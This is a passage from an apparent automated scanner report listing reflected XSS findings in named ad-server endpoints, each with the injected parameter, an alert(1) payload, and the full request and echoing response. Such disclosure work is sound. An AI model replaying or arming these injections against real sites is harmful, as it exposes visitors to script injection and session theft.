   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/18497942202"-alert(1)-"315bbf99bf2/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.84183034786376
...[SNIP]...

3.45. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3723"-alert(1)-"86da9ead8b1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServeb3723"-alert(1)-"86da9ead8b1/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5279BF91DE610D58DA9B8A67BF08C219; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:32:00 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServeb3723"-alert(1)-"86da9ead8b1/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafe
...[SNIP]...

3.46. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [flash parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the flash request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f12a5"-alert(1)-"4cae985354f was submitted in the flash parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10f12a5"-alert(1)-"4cae985354f&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=89D1E63635A9A549E99B2C87A565B70C; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:58 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10f12a5"-alert(1)-"4cae985354f&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "f
...[SNIP]...

3.47. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbce9"-alert(1)-"c20e75cf945 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639&fbce9"-alert(1)-"c20e75cf945=1 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3CE2B0610A4BA16DB8EDA52217788F23; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:59 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639&fbce9"-alert(1)-"c20e75cf945=1",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "4b477594-0429-11e1-954b-003048cc6f90"
};


(functi
...[SNIP]...

3.48. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d2da"-alert(1)-"963b56b754 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P115201109261748194d2da"-alert(1)-"963b56b754&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D7A71FF0BF0D0B647E91AD84AEA59DEF; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:57 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P115201109261748194d2da"-alert(1)-"963b56b754&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqqu
...[SNIP]...

3.49. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e89b"-alert(1)-"8fb850ab93d was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC520905e89b"-alert(1)-"8fb850ab93d&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97A7E8CF12C148F43D7B5BB33AF435AE; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:57 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC520905e89b"-alert(1)-"8fb850ab93d&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   d
...[SNIP]...

3.50. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [r parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the r request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 306ae"-alert(1)-"7022657cf22 was submitted in the r parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639306ae"-alert(1)-"7022657cf22 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=99E968F6C4A31A3325A220CFA2D7A833; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:59 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639306ae"-alert(1)-"7022657cf22",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "4b1a4ac0-0429-11e1-8dd7-00259036a3ce"
};


(function
...[SNIP]...

3.51. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67253"-alert(1)-"ef60871d9b9 was submitted in the redir parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$67253"-alert(1)-"ef60871d9b9&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7F4663C198D0BB0547DCD36B6B1AA789; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:59 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-5&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$67253"-alert(1)-"ef60871d9b9&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "4af7a783-0429-11e1-8dd7-002590
...[SNIP]...

3.52. http://fw.adsafeprotected.com/rjss/ads.pointroll.com/10794/184979/PortalServe/ [time parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjss/ads.pointroll.com/10794/184979/PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72cbe"-alert(1)-"0d58657472 was submitted in the time parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjss/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-572cbe"-alert(1)-"0d58657472&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639 HTTP/1.1
Host: fw.adsafeprotected.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=65F5E597A488065BF0B9A3F95C11853B; Path=/
Content-Type: text/javascript
Date: Tue, 01 Nov 2011 01:31:58 GMT
Connection: close


var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.politico.com/",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/ads.pointroll.com/10794/184979/PortalServe/?pid=1422961P11520110926174819&pub=IC52090&flash=10&time=1|20:31|-572cbe"-alert(1)-"0d58657472&redir=http://a1.interclick.com/icaid/203870/tid/bfde890d-7cc9-4ffa-a29d-df5ed661aad8/click.ic?$CTURL$&r=0.8418303478637639",
   adsafeSep : "&",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPho
...[SNIP]...

3.53. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca2cc'-alert(1)-'ca99a4bfd79 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=27180&pixId=41&ran=0.9659724633679442&pageURL=http://www.politico.com/ca2cc'-alert(1)-'ca99a4bfd79 HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-fabab561-e2c9-4030-a70b-8b4142c28f31.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A; pubfreq_27181=; pubtime_27181=TMC; pubfreq_27181_22456_1912778120=165-1; PMDTSHR=cat:; pubfreq_27181_22236_1608688478=325-1; KTPCACOOKIE=YES; pubfreq_27181_22457_396615642=165-1; pubfreq_27181_22238_596001637=893-1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:29:45 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 513

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/27180/41/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
o" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=41&pubId=27180&ran=0.9659724633679442&pmoo=0&pageURL=http://www.politico.com/ca2cc'-alert(1)-'ca99a4bfd79">
...[SNIP]...

3.54. http://image3.pubmatic.com/AdServer/UPug [ran parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image3.pubmatic.com
Path:   /AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a58'-alert(1)-'37205a44657 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/UPug?operId=2&pubId=27180&pixId=41&ran=0.9659724633679442a0a58'-alert(1)-'37205a44657&pageURL=http://www.politico.com/ HTTP/1.1
Host: image3.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-fabab561-e2c9-4030-a70b-8b4142c28f31.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A; pubfreq_27181=; pubtime_27181=TMC; pubfreq_27181_22456_1912778120=165-1; PMDTSHR=cat:; pubfreq_27181_22236_1608688478=325-1; KTPCACOOKIE=YES; pubfreq_27181_22457_396615642=165-1; pubfreq_27181_22238_596001637=893-1

Response

HTTP/1.1 200 OK
Date: Tue, 01 Nov 2011 01:29:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 513

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/27180/41/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
nheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=41&pubId=27180&ran=0.9659724633679442a0a58'-alert(1)-'37205a44657&pmoo=0&pageURL=http://www.politico.com/">
...[SNIP]...

3.55. http://mediaservices-d.openxenterprise.com/w/1.0/afr [auid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The value of the auid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc65c'-alert(1)-'3cfef65f846 was submitted in the auid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824cc65c'-alert(1)-'3cfef65f846&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:15:21 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:15:21 GMT
Content-Type: text/html
Content-Length: 683
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824cc65c'-alert(1)-'3cfef65f846&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&rc=11")', 60*1000);</script>
...[SNIP]...

3.56. http://mediaservices-d.openxenterprise.com/w/1.0/afr [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9af'-alert(1)-'8c83aaf82f3 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HEREcb9af'-alert(1)-'8c83aaf82f3&rd=60&rm=25 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:16:05 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
